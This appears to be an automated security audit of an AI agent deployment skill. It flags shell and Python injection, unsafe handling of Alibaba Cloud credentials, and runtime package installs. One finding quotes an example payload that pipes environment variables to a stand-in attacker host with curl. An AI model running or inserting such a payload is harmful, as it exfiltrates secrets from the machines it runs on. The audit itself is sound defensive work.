deploy-ecs-service

Fail

Audited by Gen Agent Trust Hub on May 14, 2026

Risk Level: HIGH
COMMAND_EXECUTION, CREDENTIALS_UNSAFE, EXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION]: The skill is susceptible to multiple shell command injection vulnerabilities. Variables extracted from the session context, such as DOMAIN, PROJECT_LOCAL, and SERVICE_DESC, are directly interpolated into shell commands (e.g., ssh, grep, rsync, and cat in Steps 2, 3, 6, and 8). A malicious user providing an input like "; curl attacker.com/$(env | base64) #" for the DOMAIN parameter could achieve arbitrary code execution or data exfiltration on the local machine or remote server.
  • [COMMAND_EXECUTION]: In Step 4, the skill generates and executes a Python script via python3 -c using direct string interpolation of parameters like ak, sk, ZONE, and RR. This pattern allows for Python code injection if the underlying variables are manipulated to break out of string literals.
  • [CREDENTIALS_UNSAFE]: The skill explicitly reads highly sensitive cloud credentials (ALIYUN_DNS_ACCESS_KEY_ID and ALIYUN_DNS_ACCESS_KEY_SECRET) from a local .env file. While these are used for the intended purpose of updating DNS records via the Alibaba Cloud API, the presence of command injection vulnerabilities significantly increases the risk of these credentials being harvested by an attacker.
  • [EXTERNAL_DOWNLOADS]: The skill attempts to install a Python package (aliyun-python-sdk-alidns) at runtime if it is missing. Although this package is the official SDK for a well-known service (Alibaba Cloud), dynamic package installation during execution is a security risk if the environment is compromised or if the package name is targeted by typosquatting in future versions of the skill.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: May 14, 2026, 09:03 AM